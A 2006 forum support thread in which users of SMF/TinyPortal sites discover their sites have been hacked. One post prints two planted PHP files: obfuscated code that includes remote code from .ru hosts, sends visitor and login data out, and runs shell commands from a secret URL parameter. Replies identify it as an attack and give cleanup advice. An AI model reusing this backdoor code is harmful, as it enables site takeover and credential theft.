TP-Docs
HTML5 Icon HTML5 Icon HTML5 Icon
TP on Social Media

Recent

User

Welcome to TinyPortal. Please login or sign up.

May 15, 2024, 12:03:37 AM

Login with username, password and session length

Stats

Members
  • Total Members: 3,886
  • Latest: Grendor
Stats
  • Total Posts: 195,188
  • Total Topics: 21,220
  • Online today: 112
  • Online ever: 3,540 (September 03, 2022, 01:38:54 AM)
Users Online
  • Users: 0
  • Guests: 109
  • Total: 109

Unexpected $end error

Started by tattooedpierre, June 22, 2006, 03:59:08 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages 1 2 All
User actions

GTS

#10
June 22, 2006, 05:01:12 PM
No problem :)

If a backup isnt available (or it's too old) you could still reinstall SMF. If you configure it right, it should pick up all the postings, members and other stuff that remained in the database :)

tattooedpierre

#11
June 22, 2006, 06:42:38 PM
Quote from: Xarcell on June 22, 2006, 04:59:35 PM
I think the problem is your subs.php. There is an error in the script.

Did you add a mod or something?

Not as far as I recall. I have a lot of custom stuff (totally seperate from SMF) though.

PioneeR

#12
June 24, 2006, 03:24:23 PM
Hi,
I have the exact same problem!

Just been trying to replace the odd file with the default SimpleMachines one. It looks like a load of .php have been truncated almost chopped in half?!

Very odd indeed. Looks like it happened just before 1am this morning.

In my tmp directory I have two files too (again created at the same time)..

create.php

Code Select
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

and

base.php

Code Select
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l="base64_encode($_POST["l"]) ."&p="base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l="$_POST["l"] ."&p="$_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u"ip2long(getenv(REMOTE_ADDR))) ."&url="base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

Anything to do with my problems??

GTS

#13
June 24, 2006, 03:52:30 PM
as i said on SMF boards (which seem to be down again) that script looks pretty suspicious.

It tries to contact a remote php script (http://bis.iframe.ru/master.php) with suspicious arguments.

I would suspect an hacking attempt, but i'm not really sure.

tattooedpierre

#14
June 24, 2006, 05:46:37 PM
Quote from: GTS on June 24, 2006, 03:52:30 PM
as i said on SMF boards (which seem to be down again) that script looks pretty suspicious.

It tries to contact a remote php script (http://bis.iframe.ru/master.php) with suspicious arguments.

I would suspect an hacking attempt, but i'm not really sure.

Really?? I never even considered a hacking attemt. I'll look over the files again, that directory in specific. Thanks for the input, guys. Much appreciated.

PioneeR

#15
June 24, 2006, 05:53:03 PM
Def an hack here. Put in dodgy .htaccess files, changed perms, truncated various files and uploaded dodgy ones :(

G6Cad

#16
June 24, 2006, 05:56:43 PM
Have you all updated you sites with the TP upgrade form the download section here ?
If not i strongly recomend you to do so, and then after you have don that, see if the forum are up and working again.
If it is a hacking attempt and it is done through the shoutbox, you should be good with just replacing the files with the ones from the update pack here.

GTS

#17
June 24, 2006, 05:57:34 PM
Quote from: winrules
Delete those files immediatally, clear out the bad code from your .htaccess files, and reupload all SMF files. You should also change all passwords. More information can be found here.

Just quoting the post on SMF Forums, so you people see it too.

PioneeR

#18
June 25, 2006, 01:13:11 AM
Just had another site go down (same as above) This time a mambo based one. Only just found out... happened a few mins after the other one.

Print
Go Up Pages 1 2 All
User actions